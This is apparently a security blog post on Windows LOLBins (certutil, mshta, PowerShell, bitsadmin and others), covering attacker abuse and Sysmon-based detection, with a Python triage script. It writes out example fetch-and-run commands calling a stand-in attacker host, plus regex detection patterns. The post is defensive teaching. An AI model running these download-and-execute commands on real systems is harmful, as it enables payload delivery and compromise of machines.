
LOLBins: Binaries Laughing Out Loud

  • Writer: Aastha Thakker
  • 19 hours ago
  • 3 min read

Let’s put aside the “Hollywood” movie portrayals of hacking: none of these attacks involve custom malware or exotic 0-days. Some of the worst attacks being carried out use software that shipped with your machine right out of the box, intended for legitimate tasks.


That’s what LOLBins are (NOT “Laugh Out Loud”). Living Off the Land Binaries are legitimate Windows executables that attackers repurpose to do their malicious work. Since these tools are signed by Microsoft and trusted by your OS, most security software never thinks twice about them. That’s exactly the point.


The three you’ll encounter most


1. certutil.exe is a certificate management utility. Totally boring, totally legitimate. Attackers use it to download payloads straight from the internet and decode base64-encoded files on the fly:

certutil -urlcache -split -f http://attacker.com/payload.exe payload.exe

No browser. No PowerShell. Just a certificate tool fetching malware, and most environments won’t flag it.


2. mshta.exe runs Microsoft HTML Application files. Admins use it occasionally. Attackers love it because a single line can execute a remote script the moment it's run. One command, remote code execution. The script never even has to touch disk.

3. powershell.exe barely needs an introduction, but the real abuse pattern worth knowing is in-memory execution. The command below downloads and runs a script without saving any file:

powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://attacker.com/script.ps1')"

The flags tell the story: -nop skips the profile, -w hidden keeps the window invisible, and IEX executes whatever comes back from the URL. If you ever see these three together in a log, stop what you're doing.


Where they show up in an attack


LOLBins don’t belong to one phase of an attack; they span the whole chain. During execution, certutil and mshta drop or run payloads. For persistence, schtasks.exe and reg.exe quietly create scheduled tasks or touch registry keys. Lateral movement often goes through wmic.exe. Even data exfiltration has its LOLBin: bitsadmin.exe, the client for Windows’ background file transfer service, has been used to move stolen data out of networks.

The LOLBAS project at lolbas-project.github.io catalogs every one of these tools with exact commands and their MITRE ATT&CK mappings. If you haven’t bookmarked it, do it now.


Why detection is genuinely hard


These tools run hundreds of times a day in normal environments. The attacker’s usage looks almost identical to the admin’s usage. What separates the two is context: what process spawned the tool, what arguments were passed, and what happened right after.

A few patterns that should always raise questions: certutil or mshta making outbound network connections. PowerShell launched with encoded commands or hidden window flags. Any LOLBin spawning cmd.exe as a child process. LOLBins writing files to %Temp% or AppData.


Sysmon is your best starting point. Event ID 1 captures full process creation with command-line arguments, and that’s where most of this becomes visible. Layer that with PowerShell’s ScriptBlockLogging and you have solid coverage. EDR tools like CrowdStrike or Microsoft Defender for Endpoint track the full process tree, which makes spotting abuse chains much faster than reading raw logs.
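To make the “context” point concrete, here is an added example (not from the original post) that applies the patterns listed above to a handful of constructed Sysmon Event ID 1 records: the image, its parent and its command line. It flags certutil downloads, mshta fetching a remote script, PowerShell launched hidden/encoded/in-memory, and cmd.exe spawned by a LOLBin, while letting a routine certutil -store call through. Field names follow Sysmon’s Event ID 1 schema; the sample events and the rule names are my own.

```python
import re

# Constructed Sysmon Event ID 1 records (trimmed to three fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "certutil -urlcache -split -f http://attacker.example/payload.exe payload.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": "certutil -store My"},          # routine admin use: must not fire
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "mshta http://attacker.example/page.hta"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX(New-Object Net.WebClient)"
                    ".DownloadString('http://attacker.example/script.ps1')\""},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "cmd.exe /c dir"},
]

# Binaries the post calls out across the attack chain.
LOLBINS = {"certutil.exe", "mshta.exe", "powershell.exe", "bitsadmin.exe",
           "wmic.exe", "schtasks.exe", "reg.exe"}

# (rule name, image basename, command-line pattern): argument-level context per binary.
RULES = [
    ("certutil download/decode", "certutil.exe",
     re.compile(r"-(urlcache|decode)\b|https?://", re.I)),
    ("mshta remote script", "mshta.exe", re.compile(r"https?://", re.I)),
    ("powershell hidden/encoded/in-memory", "powershell.exe",
     re.compile(r"-w(indowstyle)?\s+hidden|-e(nc|ncodedcommand)?\b|\bIEX\b|DownloadString", re.I)),
]

def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def triage(event):
    """Return the list of rule names that fire for one Event ID 1 record."""
    hits = []
    image, parent, cmd = basename(event["Image"]), basename(event["ParentImage"]), event["CommandLine"]
    for name, binary, pattern in RULES:
        if image == binary and pattern.search(cmd):
            hits.append(name)
    if image == "cmd.exe" and parent in LOLBINS:       # parent-child context rule
        hits.append(f"cmd.exe spawned by {parent}")
    return hits

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(f"{basename(ev['Image']):15} -> {triage(ev) or 'no hit'}")
```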


Application whitelisting via AppLocker adds another layer by restricting which paths binaries can execute from. It doesn’t eliminate the problem, but it raises the bar significantly.


Why this matters for you right now

LOLBin abuse isn’t an advanced technique reserved for nation-state actors anymore. It shows up in commodity ransomware, phishing campaigns, and red team engagements targeting organizations of every size. Understanding it is what separates someone who knows security theory from someone who actually understands how attacks land.


The next step is to spin up a Windows VM, install Sysmon with a decent config, run some of these commands, and watch what gets logged. The gap between “I read about this” and “I’ve seen it in logs” changes how you think about detection entirely.

